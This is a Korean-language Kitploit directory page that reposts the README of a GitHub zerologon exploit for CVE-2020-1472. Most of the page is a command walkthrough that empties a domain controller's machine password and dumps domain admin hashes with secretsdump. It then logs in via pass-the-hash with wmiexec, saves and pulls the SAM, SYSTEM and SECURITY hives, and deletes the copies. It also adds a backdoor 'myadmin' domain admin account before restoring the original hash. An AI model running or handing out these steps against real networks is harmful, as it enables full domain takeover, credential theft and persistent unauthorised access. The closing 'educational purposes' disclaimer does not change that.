Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
zerologon — CVE-2020-1472(CVSS 10/10)를 악용하는 zerologon 스크립트 | Kitploit
도구/GitHubGitHub/wrathfuldiety/zerologon
Password CrackingPrivilege EscalationVulnerability AnalysisExploitationLateral MovementPost-ExploitationPenetration TestingLearning & Education
GitHubwrathfuldiety/zerologon

zerologon

CVE-2020-1472(CVSS 10/10)를 악용하는 zerologon 스크립트

저장소 보기
25년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

zerologon

zerologon 스크립트로 CVE-2020-1472 CVSS 10/10 익스플로잇 익스플로잇 코드는 https://www.secura.com/blog/zero-logon 및 https://github.com/SecuraBV/CVE-2020-1472 기반. 원본 연구 및 스캐너는 Secura, 수정은 RiskSense Inc. https://github.com/risksense/zerologon

익스플로잇을 위해 이전 Impacket 설치를 모두 제거하고 https://github.com/SecureAuthCorp/impacket/commit/b867b21 또는 그 이상 버전에서 Impacket을 설치합니다.

apt update

apt remove --purge impacket-scripts python3-impacket apt autoremove

git clone https://github.com/rthalley/dnspython.git sudo python3 setup.py install cd .. git clone https://github.com/SecureAuthCorp/impacket.git cd impacket sudo python3 setup.py install git clone

그런 다음, 다음을 실행합니다:

python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR

성공하면 다음을 할 수 있습니다:

sudo secretsdump.py -just-dc domain/hostname\$@ip

암호 입력 프롬프트에서 "Enter"를 누르면 통과되며, 도메인 관리자 해시를 얻을 수 있습니다. 그 해시를 얻은 후 secretsdump에서 얻은 자격 증명으로 대상 DC에 wmiexec.py를 실행합니다.

wmiexec.py domain/Administrator@ip -hashes hash

그리고 다음을 실행합니다:

reg save HKLM\SYSTEM system.save
get system.save
del /f system.save

reg save HKLM\SAM sam.save
get sam.save
del /f sam.save

reg save HKLM\SECURITY security.save
get security.save
del /f security.save

그리고 만일을 대비해 새 관리자 계정을 만들 수 있습니다:

net user myadmin Hello1234 /ADD /DOMAIN

새 계정을 도메인 관리자 그룹에 추가하여 완전한 권한을 얻습니다:

net group "Domain Admins" myadmin /ADD /DOMAIN

아마도 지금 C:>에서 exit를 입력합니다.

그런 다음 다음을 실행할 수 있습니다:

sudo secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

그러면 머신 계정의 원래 NT 해시를 볼 수 있습니다. 그런 다음 다음을 사용하여 원래 머신 계정 해시를 도메인에 다시 설치할 수 있습니다:

python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH

DC가 정상적으로 작동을 계속하려면 원래 해시를 다시 설치하는 것이 필요합니다.

복원 과정이 잘 작동했는지 확인하기 위해 다음을 실행합니다:

sudo secretsdump.py -just-dc domain/hostname\$@ip

그리고 암호 프롬프트에서 "Enter"를 눌러도 더 이상 통과되지 않습니다.

여기까지입니다.

즐거운 사냥 되세요.

면책 조항: 이는 순전히 교육 목적으로 제공되며, 어떠한 행동이나 그 결과에 대해서도 책임을 지지 않습니다. 다른 사람의 장치에 해킹하는 것은 불법이며 법적으로 처벌받을 수 있습니다.

도구 다운로드